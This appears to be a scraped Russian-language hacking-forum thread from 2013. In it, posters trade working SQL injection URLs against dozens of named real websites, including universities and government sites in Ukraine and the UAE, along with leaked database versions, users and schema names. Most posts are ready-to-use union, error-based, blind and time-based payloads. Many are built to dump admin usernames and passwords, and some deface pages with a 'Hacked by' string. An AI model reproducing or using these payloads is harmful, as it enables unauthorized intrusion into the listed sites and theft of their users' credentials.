db 5 version
CY:0||PR:2
==================================================
www.rielty-plus.ru
PHP:
http://www.rielty-plus.ru/card4flat.php?id=22+or+1+group+by+concat((select+0 x76657273696f6e73716c),0x00,floor(rand(0)*2))havin g+min(0)+or+1--+
db 5 version
CY:10||PR:1
==================================================
socio.bas-net.by
PHP:
http://socio.bas-net.by/newsdetailed.php?id=23+or+1+group+by+concat((selec t+0x76657273696f6e73716c),0x00,floor(rand(0)*2))ha ving+min(0)+or+1--+
db 5 version
CY:40||PR:5
==================================================
shkolaint8.ru
PHP:
http://shkolaint8.ru/index.phtml?id=24+or+1+group+by+concat((select+0x7 6657273696f6e73716c),0x00,floor(rand(0)*2))having+ min(0)+or+1--+
db 5 version
CY:0||PR:1
==================================================
creator.org.ua
PHP:
http://creator.org.ua/show.php?id=26+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:0||PR:1
==================================================
www.hobbycenter.by
PHP:
http://www.hobbycenter.by/news.php?id=27+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:40||PR:5
==================================================
idel-travel.com
PHP:
http://idel-travel.com/t.php?id=31+or+1+group+by+concat((select+0x7665727 3696f6e73716c),0x00,floor(rand(0)*2))having+min(0) +or+1--+
db 5 version
CY:0||PR:1
==================================================
Почта России
Code:
http://www.gcmpp.ru/zona/pravovie_documenti/pravovie_documenti.php?action=view&cat=2+and+1=0+Union+Select+1,2,0x4861636b656420627 9205365706f,4,5,6--
dom-secret.ru
PHP:
http://dom-secret.ru/article.php?id=31+or+1+group+by+concat((select+0x7 6657273696f6e73716c),0x00,floor(rand(0)*2))having+ min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
bat.crimea.ua
PHP:
http://bat.crimea.ua/excursion_items/excursion_items.php?id=32+or+1+group+by+concat((se lect+0x76657273696f6e73716c),0x00,floor(rand(0)*2) )having+min(0)+or+1--+
db 5 version
CY:20||PR:1
==================================================
www.ishimtur.ru
PHP:
http://www.ishimtur.ru/index.php?id=35+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
www.hlebspb.ru
PHP:
http://www.hlebspb.ru/news.html?id=39+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:30||PR:2
==================================================
www.telar.ru
PHP:
http://www.telar.ru/products.php?id=39+or+1+group+by+concat((select+0x 76657273696f6e73716c),0x00,floor(rand(0)*2))having +min(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
www.smol-kabel.ru
PHP:
http://www.smol-kabel.ru/index.php?module=catalog&id=89+and(select+1+from(select+count(*),concat((se lect+0x76657273696f6e73716c),0x00,floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)--+
db 5 version
CY:90||PR:1
==================================================
www.prom-info.com
PHP:
http://www.prom-info.com/index.php?m=4&id=92+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
www.mynany.org
PHP:
http://www.mynany.org/index.php?module=articles&file=article&id=98+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
www.matkarhea.fi
PHP:
http://www.matkarhea.fi/index.php?id=57+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:0||PR:3
==================================================
www.tpo-orlov.ru
PHP:
http://www.tpo-orlov.ru/?Id=50+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
ufdvgu.ru
PHP:
http://ufdvgu.ru/events/anons/show/?id=51+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:350||PR:4
==================================================
www.medy.ru
PHP:
http://www.medy.ru/pages.php?id=59+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:30||PR:1
==================================================
nikimlt-povolgye.ru
PHP:
http://nikimlt-povolgye.ru/catalog_lvl2/?id=60+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:30||PR:2
==================================================
www.spycamera.ru
PHP:
http://www.spycamera.ru/print.php?id=62+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:400||PR:4
==================================================
suz-antiq.ru
PHP:
http://suz-antiq.ru/index.php?part=catalog&cat=7&id=67+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:2
==================================================
www.alfa-perevod.ru
PHP:
http://www.alfa-perevod.ru/ru/news?id=70+or+1+group+by+concat((select+0x76657273 696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+ or+1--+
db 5 version
CY:90||PR:3
==================================================
www.marbellalux.ru
PHP:
http://www.marbellalux.ru/rent_apartament_order.php?id=70+or+1+group+by+conc at((select+0x76657273696f6e73716c),0x00,floor(rand (0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:1
==================================================
www.travel.vbg.ru
PHP:
http://www.travel.vbg.ru/catalog/hotel.php?id=71+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:20||PR:4
==================================================
www.datsha.com
PHP:
http://www.datsha.com/rus/news.php?id=86+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:40||PR:4
==================================================
mice.crimea.ua
PHP:
http://mice.crimea.ua/news.php?id=88+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:10||PR:2
==================================================
www.moreodor.ru
PHP:
http://www.moreodor.ru/php/page.php?m=57&id=101+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:0
==================================================
Unknowhacker
12.08.2013, 01:02
Code:
http://www.xits-sound.com/details.php?id=-13%27+union+select+1,2,3,%28select%28@x%29from%28s elect%28@x:=0x00%29,%28select%28null%29from%28xits soun.users%29where%280x00%29in%28@x:=concat%28@x,0 x3c62723e,username,0x3a,password%29%29%29%29x%29,5 ,6,7,8+--+
sabotage-rockgroup.ru
PHP:
http://sabotage-rockgroup.ru/modules/publication/article.php?id=1+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:130||PR:1
==================================================
sochland.ru
PHP:
http://sochland.ru/sub5/?id=4+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:20||PR:3
==================================================
metrofashion.ru
PHP:
http://metrofashion.ru/content.php?id=5+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 4 version
CY:40||PR:2
==================================================
www.ryabov.com
PHP:
http://www.ryabov.com/article.php?id=36+or+1+group+by+concat((select+0x7 6657273696f6e73716c),0x00,floor(rand(0)*2))having+ min(0)+or+1--+
db 5 version
CY:0||PR:1
==================================================
http://
www.stratfordcitycentre.ca
/announce.php?id=49+and+1=2+union+select+1,2,group_ concat(username,0x3a,password),4 from users --+
================================
blind, первая буква названия базы s
http://
www.scit.edu.in
/announce.php?id=14' and(substr(database(),1,1)='s') and '1 --+
================================
blind, mysql 5 версии
http://
www.jmmgrace.com
/announce.php?id=P126' and(substr(version(),1,1)=5) and '1 --+
================================
http://
www.ripcoms.com
/announce.php?ID=1'+and+1=2+union+select+1,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),3,4,5,6,7,8 --+
================================
Unknowhacker
12.08.2013, 17:46
Code:
http://hafiz-chair.com/gallery.php?id=-6+union+select+1,2,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28webbrend_h afiz.userlist%29where%280x00%29in%28@x:=concat%28@ x,0x3c62723e,user,0x3a,pass%29%29%29%29x%29+--+
http://www.sprucedanddappa.net/shop.php?id=2&sid=-3+union+select+1,2,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28hunterde_s dshop.admin%29where%280x00%29in%28@x:=concat%28@x, 0x3c62723e,admin_name,0x3a,admin_pass%29%29%29%29x %29,4,5+--+
Code:
http://vniispk.ru/news/konferenciya_2008/article.php?id=-6+and+1=0+Union+Select+1,2,3,4,5,0x4861636b6564206 279205365706f,7,8--
http://
www.vinta.ru
/humor.php?act=show&id=520+and+1=2+union+select+1,2,version(),group_co ncat(usertype,0x3a,username,0x3a,password),5 from zolotykh_users +--+&width=1467
================================
http://
www.belrotaryplunge.com
/participant.php?id=31'+and+1=2+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(user name,0x3a,password),18,19,20,21,22,23,24,25,26,27, 28,29 from users+--+
================================
http://
www.juinanews.com.br
/humor.php?id=4 and(substr(version(),1,1)=5) and 1 --+
================================
http://
www.rycorealty.com
/clientAdvantageNetwork/participant.php?id=-43+union+select+1,2,3,4,(select(@x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22 --+
================================
http://
www.imcconcerts.com
/tour.php?id=12+and+1=2+union+select+1,2,(select(@x ) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4,5,6,7,8,9,10,11,12, 13,14,15,16 --+
================================
тиц 2900
HTML:
http://rzd.inte[google]rgid.ru/index.php
уязвимы поля "Откуда" и "Куда", выводит сразу же
Пример "'union select version() -- "
5.5.13-log
LIST_CITYES@xml.biletix.ru
http://
www.m.go4bike.com
/opinions.php?id=404'+and+1=0+union+select+1,2,3,4, 5,group_concat(loginname,0x3a,password),7,8,9 from admin --+
================================
pr=2
http://
www.sunbelt-reps.com
/territory.php?id=2+and+1=2+union+select+1,group_co ncat(cal_login,0x3a,cal_passwd),3,4,5,6,7,8 from webcal_user --+
================================
http://
www.jboiler.ru
/catalog/seria.php?se=-6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),19,20,21,22,23,24 --+
================================
Code:
http://www.bullydog.com/preferred_dealer.php?dealer=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,0x4861636b65642 06279205365706f--
http://
www.twitney.co.uk
/theme.php?id=7+and+row(1,1)>(select+count(*),concat((select +version()),0x3a,database(),0x3a,user(),floor(rand (0)*2)) x from information_schema.tables group by x )
================================
blind, mysql 5 ветки
http://
www.guidesonthefly.com
/river.php?id=39 and substring((version()),1,1)=5
================================
http://
www.vikon-ryad.com.ua
/dveri-terminus-seria.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x3a, version(),database(),user()) --+
================================
http://
www.detkinashi.ru
/chap.php?id=-6+union+select+1,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),3,4,5,6,7,8 --+
================================
pr=4, blind, mysql 5 версии
http://
www.trim.no
/pub/art.php?id=1189' and (substring(database(),1,1))='a' and '1
Unknowhacker
16.08.2013, 18:04
Фотограф Павел Киселёв (смотреть title)
Code:
http://www.photokiselev.com/info.php?CID=-3+union+select+1,2,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28u36043.stu dent%29where%280x00%29in%28@x:=concat%28@x,0x3c627 23e,login,0x3a,pass%29%29%29%29x%29,4,5,6,7,8,9+--+
Еженедельная Газета "Центр Города" (Наро-Фоминск)
Code:
http://cgnf.ru/rubric.php?id=2112+and+1=2+union+select+1,2,3,4,%2 8select%28@x%29from%28select%28@x:=0x00%29,%28sele ct%28null%29from%28cgnf.tch_users%29where%280x00%2 9in%28@x:=concat%28@x,user_login,0x3a,user_passwor d%29%29%29%29x%29,6,7,8,9+--+
См. исходный код страницы 254 строка.
GOV
SHARJAH INTERCITY TRANSPORT
Code:
http://www.stc.gov.ae/en/transport-intercity-routes-result.php?id=-112+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13--
Unknowhacker
17.08.2013, 16:45
Notoriety Inc.
Code:
http://www.hanhdance.com/contact.php?id=-46+union+select+1,2,3,%28select%28@x%29from%28sele ct%28@x:=0x00%29,%28select%28null%29from%28hanhdan ceeditor.admin_users%29where%280x00%29in%28@x:=con cat%28@x,0x3c62723e,username,0x3a,password%29%29%2 9%29x%29,5,6,7,8+--+
.:Урукхаи:.
Code:
http://www.urukhai.ru/comment.php?id=59%27+union+select+1,2,3,4,version% 28%29,6,7+--+
4.1.22-lk-log
тиц 140
http://www.runitsa.ru/author.php?id=-1932+union+select+1,2,3,concat_ws%280x3a,login,pas swd%29+from+runitsa_admin_users--
http://
www.culdesac.nl
/artmeets/title.php?id=94+union+select+1,column_name,3,4,5,6 ,7,8,9 from information_schema.columns where table_schema=0x63756c6465736163 and table_name=0x77705F7573657273 limit 2,2 --+
================================
http://
www.airwaysmag.com
/channels.html?channel_id=999999.9+union+select+1,2 ,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23 --+
================================
http://
www.larksfieldplace.org
/residents-arts-culture.php?ID=-46'+union+select+1,2,3,4,(select(@x)from(select (@x:=0x00),(select(0)from(Larksfield_Data.CMS_Logi n)where(0x00)in(@x:=concat(@x,0x3c62723e,username, 0x3a,password))))antichat),6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20 --+
================================
blind, mysql 5 ветки
http://
www.psware.com
/Culture.php?id=10 and (substring(version(),1,1)=5)
================================
Unknowhacker
19.08.2013, 13:03
Code:
http://www.hkyongnuo.com/e-detail.php?ID=288+and+%28select*from%28select+coun t%28*%29from%28select+1+union+select+2+union+selec t+3%29x+group+by+concat%28mid%28%28select+TABLE_NA ME+from+INFORMATION_SCHEMA.TABLES+limit+0,1%29,1,6 4%29,floor%28rand%280%29*2%29%29%29z%29+and+1
Future Fins Surf Board Techlology
Code:
http://www.futuresfins.com/fin-detail.php?id=-173+union+select+1,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28Future_fut ure2.users%29where%280x00%29in%28@x:=concat%28@x,0 x3c62723e,username,0x3a,password%29%29%29%29x%29,3 ,4,5,6,7,8,9,10,11+--+
Азиатско социально-экономическое общество
Code:
http://www.aessweb.com/journal-detail.php?id=-5002%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,%28select%28@x%29from%28select%28@x:= 0x00%29,%28select%28null%29from%28pdoajcom_aess.us ers%29where%280x00%29in%28@x:=concat%28@x,0x3c6272 3e,loginid,0x3a,pwd%29%29%29%29x%29+--+
ПромХимия
Code:
http://www.phas.ru/products.php?id=-64+union+select+1,2,3,4,version%28%29+--+
4.1.22-standard-log
blind, mysql 5 версии
http://
www.gpsnamibia.com
/culture/culture.php?id=16' and (substr(version(),1,1)=5) and '1
================================
http://
www.morganmetals.com
/river.php?id=-2'+union+select+1,2,concat(username,0x3a,password) ,4,5,6,7 from admin limit 0,1 --+
================================
http://
www.apfelkraft.ch
/vb/review.php?softwareid=-1090+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50 --+
================================
blind
http://
www.ikebanasmt.com
/pop.php?id=39' and (substr(version(),1,1)=5) and '1
================================
http://
www.jdls.com
/pop.php?ID=21863'+union+all+select+1,2,3,4,5,(sele ct( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),7,8,9 --+&CAT=21
================================
Unknowhacker
21.08.2013, 17:19
ГРУППА КОМПАНИЙ Интерком Холдинг
Code:
http://www.gleot.com/news.php3?nid=-94%27+union+select+1,2,3,4,5,%28select%28@x%29from %28select%28@x:=0x00%29,%28select%28null%29from%28 information_schema.columns%29where%28table_schema! =0x696e666f726d6174696f6e5f736368656d61%29and%280x 00%29in%28@x:=concat%28@x,0x3c62723e,table_schema, 0x2e,table_name,0x3a,column_name%29%29%29%29x%29,7 ,8+--+
Сегодня blind
http://
www.siam-indo.com
/general.php?id=8 and substring(version(),1,1)=5
================================
http://
www.4urendezvous.com
/pop.php?id=4 and (substring(version(),1,1)=5)
================================
http://
www.justfindit.ca
/html/ad_detail.php?id=44953 and if(substring(version(),1,1)=5,SLEEP(5),1) --
================================
nemaniak
22.08.2013, 14:13
sfjb.org PR-5
Code:
http://sfjb.org/news/index.php?newsid=-314+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7+--+
Code:
5.0.67-COMMUNITY:SFJB@LOCALHOST:SFJBDB
tribalnetonline.com PR-5
Code:
http://tribalnetonline.com/displaynews.php?newsid=-213+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21+--+
Code:
5.0.96-community-log:tribal6@localhost:tribal6_main
beywatch.eu PR-5
Code:
http://beywatch.eu/veille_detail.php?num=-59+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,1 8+--+
Code:
5.5.33-log:istseaeu_bayroot@localhost:istseaeu_beywatch
drii.org PR-6
Code:
https://drii.org/newsdetails.php?newsid=-5'+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,0,11,12,13,14,15+--+
Code:
5.0.91-community:driwebm_mydri2@localhost:driwebm_mydri2
http://
www.exchange.abnormalcycles.com
/pop.php?id=6+union+all+select+1,2,3,4,5,6,7,concat (version(),0x3a,database(),0x3a,user()),9,10,11,12 ,13,14,15,16,17,18 --+
================================
http://
www.acttravel.com.au
/general.php?id=2+and+1=2+union+all+select+1,2,(sel ect( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4 --+
================================
BuyTRAFFIK said:
http://2012over.ru/mneniya-posetiteley-o-konce-svata-v-2012-godu.html'
как быть здесь?
http://2012over.ru/m'or(1=(select(1)from(select/**/count(*),concat(0x427920496E6F6D73,0x3A,user(),0x3 A,version(),0x3A,database(),floor(rand(0)*2))w/**/from(information_schema.columns)/**/group/**/by/**/w)a))and('')='
Unknowhacker
23.08.2013, 23:04
ANPED Серверный Устойчивый Альянс
Code:
http://www.anped.org/index.php?part=-112%27+union+select+1,2,3,4,5,%28select%28@x%29fro m%28select%28@x:=0x00%29,%28select%28null%29from%2 8anped.users%29where%280x00%29in%28@x:=concat%28@x ,0x3c62723e,username,0x3a,password%29%29%29%29x%29 ,7,8,9,10+--+
pr=8
http://
www3.bkpm.go.id
/mobile/content/general.php?m=-2'+union+all+select+1,2,3,concat_ws(0x3a,salt,user name,password),5,6,7,8,9,10,11+from users --+
================================
pr=5
http://
phd.dii.unisi.it
/general/general.php?id=-4+union+all+select+1,2,concat_ws(0x3e,version(),da tabase(),user()),4,5 --+
================================
pr=4
http://
www.drinksontario.com
/memberinfo.php?id=-70+union+all+select+1,2,3,concat(version(),0x3a,da tabase(),0x3a,user()),5,6,7,8,9,10,11,12 --+
================================
Unknowhacker
24.08.2013, 21:44
Code:
http://www.hkyongnuo.com/e-detail.php?ID=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,%28select%28@x%29from%28sele ct%28@x:=0x00%29,%28select%28null%29from%28informa tion_schema.columns%29where%28table_schema!=0x696e 666f726d6174696f6e5f736368656d61%29and%280x00%29in %28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,ta ble_name,0x3a,column_name%29%29%29%29x%29,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40+--+
Харьковский Национальный Университет им. В.Н.Каразина
Code:
http://www.univer.kharkov.ua/en/general/univer_today/photos?cat=-411+union+select+1,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28informatio n_schema.columns%29where%28table_schema!=0x696e666 f726d6174696f6e5f736368656d61%29and%280x00%29in%28 @x:=concat%28@x,0x3c62723e,table_schema,0x2e,table _name,0x3a,column_name%29%29%29%29x%29+--+&year=2666
pr=6
http://
www.jpkc.hfut.edu.cn
/2007/szlj/memberInfo.php?id=-1'+union+all+select+1,2,3,(select(@x)from(select (@x:=0x00),(select(0)from(szlj.user)where(0x00)in( @x:=concat(@x,0x3c62723e,name,0x3a,psw))))antichat ) --+
================================
http://
www.graphene-flagship.eu
/GFreg/MemberInfo.php?member=534+union(select +1,2,3,(select(@x)from(select (@x:=0x00),(select(0)from(phantoms_membersGF.tblUs ers)where(0x00)in(@x:=concat(@x,0x3c62723e,login, 0x3a,password))))antichat),5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28) --+
================================
http://
www.0931mmjy.com
/MemberInfo.php?id=-58+union+select+1,2,group_concat(0x3a,name,pwd),4, 5,6,7,8,9,10 from tb_user --+
================================
http://bolshevik-bowling.com.ua/info.php?id=-2+union+select+1,2,@@version
Интересная находка (по крайней мере, для меня )
Нашел инъекцию на http://www.gfvastgoed.be/detail.php?id=840868.
Как blind,все крутится:
http://
www.gfvastgoed.be
/detail.php?id=840868+and substring(version(),1,1)=5+--+
Подбираем количество столбцов......их аж 407
YaBtr said:
Подбираем количество столбцов......их аж
407
Ололо
Code:
http://www.gfvastgoed.be/detail.php?id=-1/**/union(select(0),1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,concat(user( ),0x3A,database(),0x3A,version(),0x3A),29,30,31,32 ,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 9,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65, 66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82 ,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,9 9,100,101,102,103,104,105,106,107,108,109,110,111, 112,113,114,115,116,117,118,119,120,121,122,123,12 4,125,126,127,128,129,130,131,132,133,134,135,136, 137,138,139,140,141,142,143,144,145,146,147,148,14 9,150,151,152,153,154,155,156,157,158,159,160,161, 162,163,164,165,166,167,168,169,170,171,172,173,17 4,175,176,177,178,179,180,181,182,183,184,185,186, 187,188,189,190,191,192,193,194,195,196,197,198,19 9,200,201,202,203,204,205,206,207,208,209,210,211, 212,213,214,215,216,217,218,219,220,221,222,223,22 4,225,226,227,228,229,230,231,232,233,234,235,236, 237,238,239,240,241,242,243,244,245,246,247,248,24 9,250,251,252,253,254,255,256,257,258,259,260,261, 262,263,264,265,266,267,268,269,270,271,272,273,27 4,275,276,277,278,279,280,281,282,283,284,285,286, 287,288,289,290,291,292,293,294,295,296,297,298,29 9,300,301,302,303,304,305,306,307,308,309,310,311, 312,313,314,315,316,317,318,319,320,321,322,323,32 4,325,326,327,328,329,330,331,332,333,334,335,336, 337,338,339,340,341,342,343,344,345,346,347,348,34 9,350,351,352,353,354,355,356,357,358,359,360,361, 362,363,364,365,366,367,368,369,370,371,372,373,37 4,375,376,377,378,379,380,381,382,383,384,385,386, 387,388,389,390,391,392,393,394,395,396,397,398,39 9,400,401,402,403,404,405,406)
P.S Блокнотом заменяем все пробелы на ничего.
pr=3
http://
www.georgiasocietyofhearingprofessionals.com
/pages/memberinfo.php?id=21+and if(substr(version(),1,1)=5,sleep(5),1)
================================
pr=2
http://
www.hkfootwear.org
/en/memberInfo.php?id=-1099+union+select+1,2,concat_ws(0x3a,adminname,adm inpwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29 from tbl_admin --+
================================
pr=2
http://
www.pch-workshop.com
/MemberInfo.php?Id=-12+union+all+select+1,2,(select(@x)from(select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4 --+
================================
DezMond™
28.08.2013, 16:00
http://www.pie-mag.com/no_cache/event-details.html?event_id=59+and+1=0+union+select+1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5 5,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71, 72,73,74,75,76,77,78,79+--+
http://
www.actradingpost.com
/trade.php?ID=413+and+1=2+union+select+1,2,3,4,(sel ect(@x)from(select (@x:=0x00),(select(0)from(ACTradingPost.Profile)wh ere(0x00)in(@x:=concat(@x,0x3c62723e,name,0x3a,pas sword))))antichat),6 --+
================================
pr=3
http://
www.bwjava.com
/tools-of-the-trade.php?id=90'+and+(substr(version(),1,1)=5)+and +'1
================================
pr=3 тиц=10
http://
www.somerikko.net
/collection/trade.php?id=2222+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5 --+
================================
http://
www.hartlepoolcarers.org.uk
/page-select.php?id=3+and+1=2+union+select+1,(select( @x) from( select (@x:=0x00),(select(0)from(carers.users)where(0x00) in(@x:=concat(@x,0x3c62723e,username,0x3a,pass)))) antichat),3,4,5,6+--+
================================
http://
nba-ube.main.jp
/m/memberinfo.php?id=-00016+union+select+1,group_concat(name,0x3a,passwo rd),3,4,5,6,7,8 from MEMBERS --+
================================
http://
www.maw.cn
/en/trade.php?id=11+and+1=2+union+select+1,2,3,concat_ ws(0x3a,username,pwd),5,6,7,8 from admin_user --+
================================
Code:
http://www.maglain.ru/news.php?nid=-121+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database(),0x4861636b6564206279205365706f),5 ,6,7,8,9,10, 1 1 ,12,13,14,15,1 6,17,18,19,20,21--
Code:
http://www.arteventjewelry.com/trade.php?id=-4+union+select+@@version
Code:
http://www.gymnasium100.nl/productinfo.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,0x4861636b6564206279205365706f, 8,9,10,11,12--
Unknowhacker
02.09.2013, 14:21
Черкасская Областная Государственная Администрация.
Code:
http://www.oda.ck.ua/index.php?lng=ukr§ion=&article=-183+union+select+1,2,%28select%28@x%29from%28selec t%28@x:=0x00%29,%28select%28null%29from%28informat ion_schema.columns%29where%28table_schema!=0x696e6 66f726d6174696f6e5f736368656d61%29and%280x00%29in% 28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name%29%29%29%29x%29,4+--+
PHP:
http://www.madminutemusic.com/artist.php?artist_id=-35+union+select+1,concat(version(),0x3a,user(),0x3 a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39--
PR: 4
version: 5.1.66
user: mondomix103@localhost
database: mondomix103_madminute
Code:
http://www.blackberryrecords.com/artist.php?artist_id=-177+union+select+1,2,concat(version(),0x3a,databas e(),0x3a,user()),4--
PR: 3
version: 5.5.33-log
user: blackbj3_admin@localhost
database: blackbj3_brecords_blackberry
Code:
http://gailseverngallery.com/index.php/component/gailsevern/view/artist/id/-732+union+select+1,2,concat(version(),0x3a,databas e(),0x3a,user()),4,5,6,7,8,9,10,11,12--
PR: 4
version: 5.1.54
user: gailsevern@localhost
database: gailsevern_joom
Code:
http://www.gallerish.com/artist.php?ArtistID=-856/**/union/**/select/**/concat(version(),0x3a,user(),0x3a,database())--
PR: 2
version: 5.5.33-log
user: galleri8_conn001@localhost
database: galleri8_ArtShowcase
Unknowhacker
02.09.2013, 23:50
FLOATING LIFE Покупка, продажа и аренда яхт!
Code:
